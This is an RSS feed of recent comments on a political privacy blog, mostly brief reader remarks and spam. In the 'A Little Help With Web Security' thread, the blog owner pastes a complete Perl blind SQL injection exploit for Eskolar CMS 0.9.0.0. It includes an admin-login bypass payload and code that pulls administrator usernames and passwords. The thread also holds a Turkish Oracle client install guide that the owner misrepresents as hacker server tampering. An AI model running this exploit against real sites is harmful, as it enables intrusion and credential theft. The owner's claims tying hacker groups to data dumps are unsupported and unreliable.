﻿<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:dc="http://purl.org/dc/elements/1.1/"><channel><title>Defend Our Freedoms From the Absense of Privacy: Recent Comments</title><link>http://defendourfreedoms.net</link><description /><generator>Quick Blogcast</generator><lastBuildDate>Sun, 05 Feb 2012 12:15:59 GMT</lastBuildDate><item><title>Comment on Neo-Nazi Creativity Movement Is Back</title><link>http://defendourfreedoms.net/2010/12/09/neo-nazi-creativity-movement-is-back.aspx#comment-10046767</link><dc:creator>CC Rider</dc:creator><description>The Creativity Movement? More like The Criminality Movement. At least this article shows that the Creativity Alliance is cleaning Creativity up and removing the most disreputable losers. I think that the day they put an end to The Criminality Movement is the day Creativity will metamorphise into a highly respected nature based religion for White people in the same way that Judaism is for Jews, Rastapharianism is for Blacks, Black Islam is for Blacks, Hinduism is for Indians, and so on. Keep up the good work Creativity Alliance and show the world that The Criminality Movement is abhorrent to all decent Creators.</description><guid isPermaLink="true">http://defendourfreedoms.net/2010/12/09/neo-nazi-creativity-movement-is-back.aspx#comment-10046767</guid><pubDate>Mon, 06 Jun 2011 05:57:31 GMT</pubDate></item><item><title>Comment on The Illuminati Agenda For The Coming New Order The PROMIS Of DAYLIGHT And The ORACLE 8i</title><link>http://defendourfreedoms.net/2009/08/12/the-illuminati-agenda-for-the-coming-new-order-the-promis-of-daylight-and-the-oracle-8i.aspx#comment-6491298</link><dc:creator>rsmolders</dc:creator><description>Why nobody responds tocomments?</description><guid isPermaLink="true">http://defendourfreedoms.net/2009/08/12/the-illuminati-agenda-for-the-coming-new-order-the-promis-of-daylight-and-the-oracle-8i.aspx#comment-6491298</guid><pubDate>Mon, 28 Mar 2011 17:12:32 GMT</pubDate></item><item><title>Comment on Understanding the Internet 102 - PayPalGate</title><link>http://defendourfreedoms.net/2009/04/14/understanding-the-internet-102--paypalgate.aspx#comment-6486305</link><dc:creator>LauffNablef</dc:creator><description>I just book marked your blog on Digg and StumbleUpon.I enjoy reading yourcommentaries.</description><guid isPermaLink="true">http://defendourfreedoms.net/2009/04/14/understanding-the-internet-102--paypalgate.aspx#comment-6486305</guid><pubDate>Mon, 28 Mar 2011 15:52:12 GMT</pubDate></item><item><title>Comment on A Little Help With Web Security</title><link>http://defendourfreedoms.net/2011/03/22/a-little-help-with-web-security.aspx#comment-6179500</link><dc:creator>Defendourfreedoms</dc:creator><description>The Turk-H, TurkHackTeams, Anonymous, Chaoscomputer Group affiliates, #HQ et al, remap the Oracle servers at the root. This allows them to download databases from the servers. Who is downloading your data and where is it going? You only know if one of their script kiddies tags your Index file. Otherwise, you don't know they reconfigured your server for their own access.&lt;br /&gt;
&lt;br /&gt;
kdesu kwrite /etc/sysctl.conf&lt;br /&gt;
&lt;br /&gt;
&lt;p&gt;/etc/sysctl.conf dosyasının en sonuna aşağıdaki satırları ekleyiniz: &lt;/p&gt;
# Oracle 10g parameters &lt;br /&gt;
kernel.shmall = 2097152 &lt;br /&gt;
kernel.shmmax = 2147483648 &lt;br /&gt;
kernel.shmmni = 4096 &lt;br /&gt;
kernel.sem = 250 32000 100 128 &lt;br /&gt;
fs.file-max = 65536 &lt;br /&gt;
net.ipv4.ip_local_port_range = 1024 65000 &lt;br /&gt;
net.core.rmem_default=4194304 &lt;br /&gt;
net.core.wmem_default=262144 &lt;br /&gt;
net.core.rmem_max=4194304 &lt;br /&gt;
net.core.wmem_max=262144 &lt;br /&gt;
&lt;br /&gt;
&lt;p&gt;Yukarıdaki dosyada yaptığımız değişiklikleri uygulamak için konsolda bu komutu çalıştırın: &lt;/p&gt;
# /sbin/sysctl -p&lt;br /&gt;
&lt;a&gt; &lt;/a&gt; &lt;br /&gt;
Oracle değişkenleri &lt;br /&gt;
&lt;p&gt;Tekrar Alt + F2 tuşuna basarak aşağıdaki komutu çalıştırın: &lt;/p&gt;
kdesu kwrite /home/oracle/.bash_profile&lt;br /&gt;
&lt;br /&gt;
&lt;p&gt;Bu dosyaya aşağıdaki satırları ekleyiniz. &lt;/p&gt;
ORACLE_BASE=/home/oracle/oracle&lt;br /&gt;
ORACLE_HOME=$ORACLE_BASE/product/10.2.0/client_1&lt;br /&gt;
ORACLE_SID=orcl&lt;br /&gt;
&lt;b style="background-color: #a0ffff; color: black;"&gt;LD_LIBRARY_PATH&lt;/b&gt;=$ORACLE_HOME/lib&lt;br /&gt;
PATH=$PATH:$ORACLE_HOME/bin&lt;br /&gt;
export ORACLE_BASE ORACLE_HOME ORACLE_SID &lt;b style="background-color: #a0ffff; color: black;"&gt;LD_LIBRARY_PATH&lt;/b&gt; PATH&lt;br /&gt;
&lt;br /&gt;
&lt;p&gt;Bu dosyayı kaydedip aşağıdaki komutları konsolda çalıştırın. &lt;/p&gt;
cd /home/oracle&lt;br /&gt;
. .bash_profile&lt;br /&gt;
&lt;a&gt; &lt;/a&gt; &lt;br /&gt;
Oracle Client İndirmek &lt;br /&gt;
&lt;p&gt;Oracle’ın sitesinden 10201_client_linux32.zip dosyasını indirin (Eğer elinizde yoksa, bu 10g için şu an 11g’de var) Dosyayı indirdikten sonra /home/oracle dizinin altına "orakur" adlı bir dizin açıp buraya kopyalayıp burada açın. Şimdi "orakur" klasörünün içinde "install" klasörünün içinde "oraparam.ini" adında bir dosya var bu dosyayı "kwrite" ile açıp &lt;/p&gt;
SILENT_VARIABLE_VALIDATION=TRUE&lt;br /&gt;
&lt;br /&gt;
[Certified Versions]&lt;br /&gt;
Linux=redhat-3,SuSE-9,redhat-4,UnitedLinux-1.0,asianux-1,asianux-2&lt;br /&gt;
&lt;br /&gt;
[UnitedLinux-1.0-optional]&lt;br /&gt;
TEMP_SPACE=80&lt;br /&gt;
SWAP_SPACE=150&lt;br /&gt;
MIN_DISPLAY_COLORS=256&lt;br /&gt;
&lt;br /&gt;
&lt;p&gt;bu satırı bulup &lt;/p&gt;
[Certified Versions]&lt;br /&gt;
Linux=redhat-3,SuSE-9,redhat-4,UnitedLinux-1.0,asianux-1,asianux-2&lt;br /&gt;
&lt;br /&gt;
&lt;p&gt;satırını tamamen silip kaydedin. &lt;/p&gt;
&lt;a&gt; &lt;/a&gt; &lt;br /&gt;
Gerekli paketler &lt;br /&gt;
&lt;p&gt;Konsolda aşağıdaki komutları sırası ile çalıştırın: &lt;/p&gt;
# sudo pisi it libaio&lt;br /&gt;
# sudo pisi it unixodbc&lt;br /&gt;
&lt;br /&gt;
&lt;p&gt;Artık kuruluma hazırız. &lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;a&gt; &lt;/a&gt; &lt;br /&gt;
Kurulum &lt;a&gt; &lt;/a&gt; &lt;br /&gt;
Kurulum &lt;br /&gt;
&lt;p&gt;Temiz bir konsol açıp &lt;/p&gt;
"su oracle" &lt;br /&gt;
&lt;br /&gt;
&lt;p&gt;ile "oracle" kullanıcısına geçin ve aşağıdaki komutları sırası ile girin &lt;/p&gt;
# cd /home/oracle/orakur/client&lt;br /&gt;
# LC_ALL=C&lt;br /&gt;
# ./runInstaller&lt;br /&gt;
&lt;br /&gt;
&lt;p&gt;Burada LC_ALL=C komutu dil ayarları ile ilgili aksi halde kurulum son aşamada hata veriyor. Kurulumdaki bütün yönergeleri takip edin. Kurulumun varsayılan yolunu değişirseniz üçüncü adımdaki parametreyi değişmeniz gerekir. Karşınıza "Network Configuration Assistant" çıkacak. "Perform Typical" olarak ayarlayıp bu kısmı da bitirin. En son size bazı dosyaları çalıştırmanızı söyleyecek, bu ekranı kapatmadan bir konsol penceresi açıp &lt;a href="http://tr.pardus-wiki.org/Root#Komut_sat.C4.B1r.C4.B1nda_k.C3.B6k_kullan.C4.B1c.C4.B1_haklar.C4.B1_elde_etmek"&gt;color=#0000ffroot&lt;/a&gt; olarak girin ve sırasıyla şu komutları çalıştırın: &lt;/p&gt;
# cd /home/oracle/oraInventory&lt;br /&gt;
# ./orainstRoot.sh&lt;br /&gt;
#&lt;br /&gt;
#&lt;br /&gt;
# cd /home/oracle/oracle/product/10.2.0/client_1&lt;br /&gt;
# ./root.sh (cevap bekleyen sorulara "ENTER" ile direk cevap verin)&lt;br /&gt;
&lt;br /&gt;
&lt;p&gt;Artık kurulum bitti&amp;nbsp;:) &lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;a&gt; &lt;/a&gt; &lt;br /&gt;
Çalıştırma &lt;a&gt; &lt;/a&gt; &lt;br /&gt;
Console’u çalıştırma &lt;br /&gt;
&lt;p&gt;Konsoldan çalıştırmadan önce mutlaka &lt;/p&gt;
LC_ALL=C&lt;br /&gt;
&lt;br /&gt;
&lt;p&gt;Komutu verilmeli. &lt;/p&gt;
&lt;p&gt;Aşağıdaki satırları; &lt;/p&gt;
LC_ALL=C&lt;br /&gt;
/home/oracle/oracle/product/10.2.0/client_1/bin/oemapp console&lt;br /&gt;
--------------------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;</description><guid isPermaLink="true">http://defendourfreedoms.net/2011/03/22/a-little-help-with-web-security.aspx#comment-6179500</guid><pubDate>Wed, 23 Mar 2011 12:15:45 GMT</pubDate></item><item><title>Comment on A Little Help With Web Security</title><link>http://defendourfreedoms.net/2011/03/22/a-little-help-with-web-security.aspx#comment-6177830</link><dc:creator>Defendourfreedoms</dc:creator><description>These sites being hacked aren't just leaving cute pictures and messages on the Index pages. They are cracking the database and downloading them. The pictures and messages are just to let you know they were there, like a gang tag. If they don't leave the gang tag, then you will never know your database was downloaded. &lt;br /&gt;
&lt;br /&gt;
http://www&lt;span style="text-decoration: underline;"&gt; &lt;strong&gt;turkhackteam&lt;/strong&gt; &lt;/span&gt;.org/eskolar-cms-0-9-0-0-&lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;remote-blind-sql-injection-exploit&lt;/span&gt; &lt;/strong&gt;-t3963.html?s=f2559d37ab0bda0567557e1ade83c6de&amp;amp;t=3963&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is the Insert SQL that was used Please note, &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;the worm that was inputted to the database contains access for future use&lt;/span&gt; &lt;/strong&gt;. What I read from the email from ElectionMall's lack of responsibility for leaving the database vulnerable, that they only reloaded the HTML splash pages and did absolutely nothing to secure the database.&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#===#!/usr/bin/perluse IO::Socket;#====================================== ================================================== ==========#======================================= =======================================## Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com ##================================================ ==============================##================== ================================================== ==============================#Title: Eskolar CMS 0.9.0.0 &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;Blind SQL Injection Exploit and bypass admin logon vulnerability&lt;/span&gt; &lt;/strong&gt;#Application: Eskolar CMS#Version: 0.9.0.0#Url: [Only Registered Users Can See Links]================================================= =================================================# ================================================== ================================================#A ffected software description:#Not properly sanitized input can be used to inject crafted &lt;b style="background-color: rgb(255,255,102); color: black;"&gt;SQL&lt;/b&gt; queries and cause#the database server to generate an invalid &lt;b style="background-color: rgb(255,255,102); color: black;"&gt;SQL&lt;/b&gt; query. We can use &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;Blind SQL Injection attack#to determine username and password for CMS and also classical SQL Injection#to bypass admin logon. Password for CMS is storing in database as clear text!#There is using addslashes() function to filtration GET variables, but we can prepare#SQL query without slashes in Blind attack&lt;/span&gt; &lt;/strong&gt;. There is not addslashes() function to filtration#variables using to log in, so we can use &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;classical SQL Injection to log in as admin&lt;/span&gt; &lt;/strong&gt;.#Vulnerable files: index.php, php/lib/del.php, php/lib/download_backup.php, php/lib/navig.php,#php/lib/restore.php, php/lib/set_12.php, php/lib/set_14.php, php/lib/upd_doc.php#====================================== ================================================== ==========#======================================= ================================================== =========#Sample vulnerable code: (Blind attack) (index.php - lines 161-172)#if (isset ($_GET['gr_1_id'])) {# $gr_1_id = (get_magic_quotes_gpc()) ? $_GET['gr_1_id'] : addslashes($_GET['gr_1_id']);#}#if (isset ($_GET['gr_2_id'])) {# $gr_2_id = (get_magic_quotes_gpc()) ? $_GET['gr_2_id'] : addslashes($_GET['gr_2_id']);#}#if (isset ($_GET['gr_3_id'])) {# $gr_3_id = (get_magic_quotes_gpc()) ? $_GET['gr_3_id'] : addslashes($_GET['gr_3_id']);#}#if (isset ($_GET['doc_id'])) {# $doc_id = (get_magic_quotes_gpc()) ? $_GET['doc_id'] : addslashes($_GET['doc_id']);#}#...#index.php - line 202#$q = "SELECT * FROM ".$prefix."_admin_group_3 WHERE id = ".$gr_3_id." ORDER BY 'sorted' ASC";#etc.#...#======================================= ================================================== =========#======================================== ================================================== ========#&lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;Bypass admin logon&lt;/span&gt; &lt;/strong&gt;:#Vulnerable code: (php/esa.php - lines 27-35)#$uid = isset ($_POST['uid']) ? $_POST['uid'] : $_SESSION['uid'];#$pwd = isset ($_POST['pwd']) ? $_POST['pwd'] : $_SESSION['pwd'];#//$prefix="esa";#$enter = 0;#$_SESSION['uid'] = $uid;#$_SESSION['pwd'] = $pwd;#&lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;mysql_select_db($database&lt;/span&gt; &lt;/strong&gt;_bkb, $bkb);#$q_a = "SELECT * FROM ".$prefix."_admin_user WHERE `user` = '".$uid."' AND `password` = '".$pwd."'";## If magic_quotes_gpc = Off attacker can &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;log in as admin using classical SQL Injection&lt;/span&gt; &lt;/strong&gt; attack.## Eg: USER: j4ck' or 1=1/*## PSW: *blank*#========================================== ================================================== =======#PoC Exploit:if ((@ARGV lt 2) or (@ARGV gt 3)) { &amp;amp;usage; }sub usage(){ &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "\r\n (c) Jacek Wlodarczyk (j4ck)\r\n\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "- Exploit for Eskolar CMS 0.9.0.0\r\n\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "- Usage: $0 &amp;lt;target&amp;gt; &amp;lt;target directory&amp;gt;\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "- &amp;lt;target&amp;gt; -&amp;gt; Victim's target eg: [Only Registered Users Can See Links]"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "- &amp;lt;target directory&amp;gt; -&amp;gt; Path to index.php eg: /eskolar/\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "- Eg: [Only Registered Users Can See Links] /esa/\r\n\r\n"; exit();}$HOST = $ARGV[0];$DIR = $ARGV[1];$prefixDB = $ARGV[2];if (@ARGV eq 2) { $prefixDB = "esa"; }&lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "\r\nATTACKING : ".$HOST.$DIR."\r\n\r\n";$HOST =~ s/([Only Registered Users Can See Links])//;#$positive = "?doc_id=999%20or%201=1--";#$negative = "?doc_id=999%20or%201=0--"; @ARR = ("user","password");&lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "Connecting ...\r\n";sleep(1);TOP:for ($k=0;$k&amp;lt;=$#ARR;$k++) { $j=1; $i = 32; $string=''; $res=''; while() { $l=0; for ($i=32;$i&amp;lt;=127;$i++) { $val = "?doc_id=99999"; $val .= "/**/or/**/1=1"; $val .= "/**/and/**/ascii(substring("; $val .= "(select/**/$ARR[$k]/**/from/**/".$prefixDB."_admin_user/**/limit/**/1)"; $val .= ",$j,1))/**/=/**/$i"; $data="$DIR$val"; $req = IO::Socket::INET-&amp;gt;new( Proto =&amp;gt; "tcp", PeerAddr =&amp;gt; "$HOST", PeerPort =&amp;gt; "80") || die "Error - connection failed!\r\n\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; $req "GET $data [Only Registered Users Can See Links]"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; $req "Host: $HOST\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; $req "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; $req "Accept-Language: en-us;q=0.7,en;q=0.3\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; $req "Accept-Encoding: gzip,deflate\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; $req "Keep-Alive: 300\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; $req "Connection: Keep-Alive\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; $req "Cache-Control: no-cache\r\n"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; $req "Connection: close\r\n\r\n"; while ($ans = &amp;lt;$req&amp;gt;) { if ($ans =~ /404/ ) { &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt;f "\n\nFile not found.\r\n\r\n"; exit; } if ($ans =~ /400/ ) { &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt;f "\n\nBad request.\r\n\r\n"; exit; } if ($ans =~ /ORDER BY sorted ASC/) { $string .= chr($i); if (((ord(substr($string,length($string)-1,length($string)-1))-ord(substr($string,length($string)-2,length($string)-2))) %2 eq 0) and (length($string) ge 2)) { $res .= chr($i-1); $l=1; } last; } } if ($l eq 1) { &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "Found: ".chr($i-1)."\r\n"; sleep(1); last; } if ($i eq 127) { &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "$ARR[$k] found: $res\r\n"; $ARR[$k] = $res; if (($k eq 1) and (($ARR[0] ne '') or ($ARR[1] ne ''))) { &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "\r\n\r\n\r\n-------------------- Username =&amp;gt; $ARR[0]"; &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; " Password =&amp;gt; $ARR[1] -----------------------\r\n"; } elsif (($ARR[0] eq '') and ($ARR[1] eq '')) { &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "Nothing found ..."; } if ($k eq 0) { sleep(1); &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "\nTrying Password\r\n"; sleep(1); } sleep(1); next TOP; } &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;print&lt;/span&gt; &lt;/strong&gt; "\t\t\t\tTrying: ".chr($i)."\r\n"; } $string = ''; $j++; } }#================================================ ================================================== ======# milw0rm.com&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: 16px;"&gt; &lt;strong&gt;So who was printing Duncan Hunter's databases and what happened to all of the people's information that assisted with that primary campaign?&amp;nbsp; Yes, the primaries are over, but the hacking, stalking and harrassing is not.&amp;nbsp; This is also a working model for all the cracks, hacks and stalking that have happened to websites since.&amp;nbsp; I just happen to have all of this data to work with.&lt;br /&gt;
&lt;br /&gt;
&lt;/strong&gt; &lt;/span&gt;</description><guid isPermaLink="true">http://defendourfreedoms.net/2011/03/22/a-little-help-with-web-security.aspx#comment-6177830</guid><pubDate>Wed, 23 Mar 2011 11:48:08 GMT</pubDate></item><item><title>Comment on A Little Help With Web Security</title><link>http://defendourfreedoms.net/2011/03/22/a-little-help-with-web-security.aspx#comment-6177160</link><dc:creator>Defendourfreedoms</dc:creator><description>Primaries are over. Why is this relevant? Because the Turk-H, TurkHackTeam are connected to all the data dumps and hacks still occuring on the Net today. When looking into the now, never forget the past.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://wwwslatecom/blogs/blogs/trailhead/archive/2008/01/17/exclusive-duncan-hunter-gets-hacked.aspx"&gt;http://wwwslatecom/blogs/blogs/trailhead/archive/2008/01/17/exclusive-duncan-hunter-gets-hacked.aspx&lt;/a&gt; &lt;br /&gt;
&lt;strong&gt;Exclusive! Duncan Hunter Gets Hacked&lt;/strong&gt; &lt;br /&gt;
Posted Thursday, January 17, 2008 6:00 PM | By Chadwick Matlin &lt;br /&gt;
In a rare occurrence, I visited Duncan Hunter's Web site today to see if it still hadn't been updated in months. Surprisingly, it had. By a hacker. &lt;br /&gt;
&lt;br /&gt;
In the scrolling news marquee, a team of hackers who go by the handles clientcode, undertaker, and theghost left a message for all of Hunter's American fans: "Kiss You Babyyy yeahhh (:" &lt;br /&gt;
&lt;br /&gt;
Is that the best they couldcome up with? How about, "Duncan Hunter is a one-delegate farce," "Duncan Hunter supports an Iraq war that's killed hundreds of thousands of people," or "Duncan Hunter, you're a God-fearing slimeball. Drop out of the race." If you're going to hack the man's site, at least do it with a little panache.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;This isn't the first time Hunter's site has been hacked, according to campaign manager Roy Tyler. He told me that a few days ago, Turkish hackers got into the site and left a message in Arabic that blasted Hunter for his pro-Iraq record. It was also hacked about a year ago.&lt;/span&gt; &lt;/strong&gt; Tyler said the campaign expected to be a hacker target, so they took extra security precautions, but to no avail. When I called, Tyler said the campaign was unaware of the latest hack, but I later found out his tech team was already on it, and it was fixed it a few minutes later. &lt;br /&gt;
&lt;br /&gt;
Trailhead found people on the Internet bragging about the hack that occurred earlier this week. &lt;span style="text-decoration: underline;"&gt; &lt;strong&gt;A hacker congregation site, Turk-h.org, seems to suggest that someone going by "ayyildiz" attacked the site because of "politik sebepler" or "political causes" (according to a Turkish-English translation done by a friend)&lt;/strong&gt; &lt;/span&gt;. But it looks like different hackers (clientcode, undertaker, and theghost) got into the site this time. If my very uneducated assumptions are correct, &lt;strong&gt; &lt;span style="text-decoration: underline;"&gt;it looks like ayyildiz is a prolific hacker, defacing over a thousand sites according to his profile on turk-h.org.&lt;/span&gt; &lt;/strong&gt; The names "clientcode" and "undertaker" also appear frequently on various hacker forums.&lt;br /&gt;
&lt;br /&gt;
But of all the sites on the Internet, ayyildiz picked Hunter's to defame. He now joins the illustrious ranks of topsexxxlinkscom and turtle-pictures.de. But look on the brightside, at least somebody somebody cares about Hunter's political beliefs.&lt;br /&gt;
&lt;br /&gt;
With Chris Wilson.&lt;br /&gt;
&lt;br /&gt;
Filed under: Duncan Hunter&lt;br /&gt;</description><guid isPermaLink="true">http://defendourfreedoms.net/2011/03/22/a-little-help-with-web-security.aspx#comment-6177160</guid><pubDate>Wed, 23 Mar 2011 11:36:48 GMT</pubDate></item><item><title>Comment on Absolut Spirits Co. Redraws U.S. Map</title><link>http://defendourfreedoms.net/2008/04/04/absolut-spirits-co-redraws-us-map.aspx#comment-4050080</link><dc:creator>Plumbing Boston</dc:creator><description>What a stupid marketing ploy!  I will never purchase Absolut again after seeing this advertisement!  Mexico taking over the US....never!! </description><guid isPermaLink="true">http://defendourfreedoms.net/2008/04/04/absolut-spirits-co-redraws-us-map.aspx#comment-4050080</guid><pubDate>Thu, 30 Sep 2010 13:55:37 GMT</pubDate></item><item><title>Comment on Wisconsin man gets 10 years in prison for arranging sex with 8-year-old girl</title><link>http://defendourfreedoms.net/2008/03/13/wisconsin-man-gets-10-years-in-prison-for-arranging-sex-with-8yearold-girl.aspx#comment-4050101</link><dc:creator>Plumbing Boston</dc:creator><description>I am so glad this man is behind bars now!  How disgusting of a person must you be to want to do these things to a little girl!  I hope he stays in jail forever!! </description><guid isPermaLink="true">http://defendourfreedoms.net/2008/03/13/wisconsin-man-gets-10-years-in-prison-for-arranging-sex-with-8yearold-girl.aspx#comment-4050101</guid><pubDate>Thu, 30 Sep 2010 13:47:58 GMT</pubDate></item><item><title>Comment on Hunter Statement on Attacks Against Rush Limbaugh</title><link>http://defendourfreedoms.net/2007/10/12/hunter-statement-on-attacks-against-rush-limbaugh.aspx#comment-4050675</link><dc:creator>Plumbing Boston</dc:creator><description>I love that Congressman Hunter issued this statement!  If both parties would stop create controversies and placing blame on the other, maybe we could actually get some work done in Congress! </description><guid isPermaLink="true">http://defendourfreedoms.net/2007/10/12/hunter-statement-on-attacks-against-rush-limbaugh.aspx#comment-4050675</guid><pubDate>Thu, 30 Sep 2010 13:45:14 GMT</pubDate></item><item><title>Comment on Salvaging the “Stimulus” Package</title><link>http://defendourfreedoms.net/2008/03/05/salvaging-the-stimulus-package.aspx#comment-4050105</link><dc:creator>Plumbing Boston</dc:creator><description>I think the zero federal taxes on domestic manufacturing would be great!  I have watched my hometown of Muncie, IN deteriorate considerably due to all the manufacturing plants moving overseas. </description><guid isPermaLink="true">http://defendourfreedoms.net/2008/03/05/salvaging-the-stimulus-package.aspx#comment-4050105</guid><pubDate>Thu, 30 Sep 2010 13:42:16 GMT</pubDate></item></channel></rss>
